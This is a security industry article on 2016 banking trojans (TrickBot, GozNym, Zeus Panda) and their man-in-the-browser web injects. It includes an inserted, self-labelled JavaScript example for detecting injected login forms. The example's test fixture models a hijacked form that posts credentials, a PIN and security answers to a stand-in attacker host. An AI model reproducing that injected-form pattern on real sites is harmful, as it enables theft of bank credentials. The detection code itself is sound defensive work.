
Some Ideas Never Die; the Trojan is Wheeled in Again

The ancient Greeks are credited with many inventions that continue today in some form – the water mill, odometer, alarm clock and cartography, to name a few. As a security professional what comes to mind instantly is the Trojan horse, devised to sneak Greek soldiers behind the walls of the city of Troy and win the war.

A few decades ago, the term resurfaced to describe a type of attack that cyber criminals have used and evolved over time to wreak havoc on financial institutions. Although ransomware and DDoS attacks have captured the attention of the security industry of late, a surge in trojan variants targeting banks across geographies is catching many by surprise.

Banking trojans steal credentials for bank accounts by sitting on a banking customer’s computer until the customer accesses the account. At that point they launch a man-in-the-browser (MITB) web injection attack, which typically creates a phishing page that sends the login details to the attacker’s command and control server. The malicious actors behind these attacks take time to learn the banking systems of specific geographies so as to avoid detection and maximize profits. They wring out cash as long as possible before moving on.
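The following is an added example, not code from the original article or from any product it mentions. It models one defensive control against the web injection described above: a page-integrity check that a bank's own front-end script could run against its login form, flagging input fields that the bank never served and a form action that no longer points at the bank's origin. The origin, field names and the two HTML snippets (a genuine form and a form after a simulated inject) are constructed for illustration.

```javascript
// Added example: detecting a man-in-the-browser web inject by comparing the
// login form the browser is about to submit against what the bank served.
// All names, origins and HTML below are constructed for this illustration.

const BANK_ORIGIN = "https://online.examplebank.test";          // assumed bank origin
const EXPECTED_LOGIN_FIELDS = ["username", "password", "csrf_token"]; // assumed baseline

// Constructed sample: the login form exactly as the bank serves it.
const GENUINE_FORM = `
<form id="login" action="/auth/login" method="post">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="hidden" name="csrf_token" value="abc123">
</form>`;

// Constructed sample: the same form after a simulated inject added fields the
// bank never asks for and repointed the action at an attacker-controlled host.
const INJECTED_FORM = `
<form id="login" action="https://collector.attacker.test/post" method="post">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="hidden" name="csrf_token" value="abc123">
  <input type="text" name="atm_pin">
  <input type="text" name="mothers_maiden_name">
</form>`;

// Minimal parser for the example: pulls the form action and input names out of
// serialized HTML. In a browser this would read the live DOM instead.
function parseForm(html) {
  const actionMatch = html.match(/<form\b[^>]*\baction\s*=\s*"([^"]*)"/i);
  const action = actionMatch ? actionMatch[1] : null;
  const names = [];
  const inputRe = /<input\b[^>]*\bname\s*=\s*"([^"]*)"/gi;
  let m;
  while ((m = inputRe.exec(html)) !== null) names.push(m[1]);
  return { action, names };
}

// Relative actions resolve against the page's own origin; absolute ones may not.
function resolveOrigin(action, pageOrigin) {
  return new URL(action, pageOrigin).origin;
}

// Returns { suspicious, findings } where findings lists each integrity
// violation: fields added to the form, expected fields removed, or a form
// action that would post credentials somewhere other than the bank.
function checkLoginForm(html, pageOrigin = BANK_ORIGIN, expected = EXPECTED_LOGIN_FIELDS) {
  const { action, names } = parseForm(html);
  const findings = [];

  const unexpected = names.filter((n) => !expected.includes(n));
  if (unexpected.length > 0) findings.push({ type: "unexpected_fields", fields: unexpected });

  const missing = expected.filter((n) => !names.includes(n));
  if (missing.length > 0) findings.push({ type: "missing_fields", fields: missing });

  if (action === null) {
    findings.push({ type: "no_action" });
  } else {
    const target = resolveOrigin(action, pageOrigin);
    if (target !== pageOrigin) findings.push({ type: "off_origin_action", target });
  }

  return { suspicious: findings.length > 0, findings };
}

// Stand-alone run: the genuine form passes, the injected form is flagged.
console.log(JSON.stringify(checkLoginForm(GENUINE_FORM)));
console.log(JSON.stringify(checkLoginForm(INJECTED_FORM)));
```

In a deployment the check would run over the live DOM (for example via `document.querySelectorAll("form#login input[name]")`) and report findings to the bank's fraud telemetry rather than to the console. It is a signal, not a guarantee: malware that controls the browser can also tamper with the checking script, which is why this kind of client-side integrity check is normally paired with server-side anomaly detection on logins and transfers.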

To help you assess your digital risk, here are three examples of trojans from 2016 that will likely continue to be active into 2017.

1. Since the discovery of the TrickBot trojan in September 2016, its operators have continued to develop the malware to target new locations and customers of new banks. In October, TrickBot targeted bank customers in Australia and Canada, but throughout the remainder of 2016 both the number of banks affected and the locations of these banks increased dramatically – spreading to the UK, Germany, Singapore and New Zealand, among others.

At this time, TrickBot primarily targets financial services customers in English-speaking countries. Given the number of targets and how quickly TrickBot is spreading across geographies it is likely that the cyber criminals behind these attacks have significant resources at their disposal, including funding, time, and capability. And that capability includes not only development resources but a network of accomplices that make these attacks profitable by doing the leg work to cash out compromised bank accounts. With what appear to be vast resources supporting the operation, it’s likely that TrickBot will continue to penetrate deeper into current target geographies and spread to other regions during the year.

2. GozNym is another banking trojan identified early in 2016. The GozNym attacks started in the U.S. and then shifted to Europe, including 17 banks in Poland and 1 in Portugal. Since the initial reporting on GozNym in April 2016, it has been developed to target new financial institutions and new geographies. Furthermore, the methods it has used, specifically the redirection attacks, likely indicate a well-resourced group developing and operating the trojan, given that fake bank pages would need to be developed for each targeted bank. This heavy investment in advanced capabilities and the rapid evolution of the attacks demonstrate that the bad actors behind these schemes are sophisticated and will likely leverage their investments to target customers in other geographies.

3. A variant of the Zeus trojan, Panda, started by targeting banks in Europe and North America but in mid-2016 spread to Brazil in advance of the Olympic games. Likely in order to take advantage of an influx of visitors engaging in online activity, Panda expanded its scope of targets beyond banks to include online payment providers, prepaid card services, bitcoin exchange platforms and even airline loyalty programs. Panda can inject malicious code into ongoing web sessions to trick users with social engineering, and grabs login credentials on the fly. Its operators make use of an Automatic Transfer System (ATS) that automates typical banking actions like transferring money. Panda has since been discovered targeting banks in the UK and Australia. It remains active and is expected to continue to target these and additional geographies in the coming year.

So how can financial institutions and their customers mitigate digital risk?

• Banks and operators of other online payment systems must remain alert and continue to monitor which geographies are being targeted. Even in regions that have been “safe” to date, it’s likely only a matter of time as these trojans are targeting different geographies in definable waves. In addition, organizations should ensure operating systems, email gateways, and malware detection solutions are up to date and hardened against such attacks.

• Individuals should be reminded not to click on unsolicited emails or attachments. Password training should also advise changing credentials frequently and not reusing corporate credentials for personal activity.

Banking trojans continue to evolve. Adopting increasingly complex techniques, they spread to new regions, incorporate new languages, and target other online payment platforms and services besides banks. If you haven’t had a trojan poised outside your walls, chances are you will. But by understanding your digital risk you can make sure you’re not welcoming it in. 

Alastair Paterson is CEO and Co-Founder of Digital Shadows. Alastair has worked for over a decade advising secure government and FTSE 100 clients on large-scale data analytics for risk and intelligence. Before founding Digital Shadows in 2011, Alastair was International Propositions Manager at BAE Systems Detica working with clients in the Gulf, Europe and Australasia. He holds a first class MEng in Computer Science from the University of Bristol.